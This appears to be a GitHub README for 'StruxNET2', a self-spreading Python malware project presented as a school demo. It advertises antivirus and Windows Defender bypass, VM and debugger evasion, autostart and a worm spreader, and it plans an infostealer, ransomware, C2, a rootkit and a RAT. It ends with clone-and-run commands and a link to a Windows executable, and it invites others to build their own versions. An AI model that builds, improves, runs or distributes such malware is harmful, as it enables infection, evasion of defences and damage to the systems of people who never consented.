A Python-based Malware that reproducet itself. Its a demo/education project for my school so.
DISCLAIMER: This is for education Purpose ONLY! I dont support any kind of illegal activitys! This Project is still Work-on-Progress
Main Changes
- StruxNET2 now split into Linux Payload and Windows Payload (Used as Dropper or entrypoint)
Windows Payload (dropper)
- AV Bypass [Windows Defender ONLY]
- VM Detection (Low)
- Autostart payload
- Detect Debugging ENV (low)
- Detect Virustotal (Maybe patched soon)
- Use UAC (Use pyinstaller for this)
- Impvoved Worm (spreader)
- Improved antiAV Detection (Virustotal scan: 7/71) [Maybe soon fixed] Virustotal Result
Linux Payload
- Improved Runtime speed a little bit
Windows Payload: ~60% Linux Payload: ~30%
Planed Windows
- Comment all functions
- Infostealer (Maybe)
- C2 Function (Maybe)
- Ransomware feature (Maybe)
- File Infection [To prevent from deleting]
- get the Worm Multithreading acces to spread faster
- RAT/Backdoor (Maybe)
- customization features
- Run fully payload stealth (No visible Console window)
Planed Linux
- Rootkit Feature (get Root access)
- Ransomware (Maybe)
- C2 (Maybe)
- File Infection [To prevent from deleting]
- Autostart like in windows
- Improve Performance
- get the Worm Multithreading acces to spread faster
- Backdoor acces/RAT (Maybe)
- customization features
- Run Stealth in background without a console window
Planed just for fun
- a Loader to build a own version without any knowledge Soon More, Fell free to post ideas in Issues Tab :)
Feel also free to make a own version of StruxNET2 lol (But please leave credits)
How to Use (Remind: IT IS MALWARE! Dont use at your main system! i dont take any Response for Damages!!)
Prerequisites
- Windows maschine or Linux
- For Linux: python3 and pip3
sudo apt update
sudo apt-get install git
<== Skip this if you have it already
git clone https://github.com/Crafttino21/StruxNET2.git
pip install -r requirments.txt
python3 StruxNET2-Linux.py
go to Releases
Install StruxNET2-Windows.exe
Run it!
Credits: I used some code from Here and improved/change it but still used some parts from there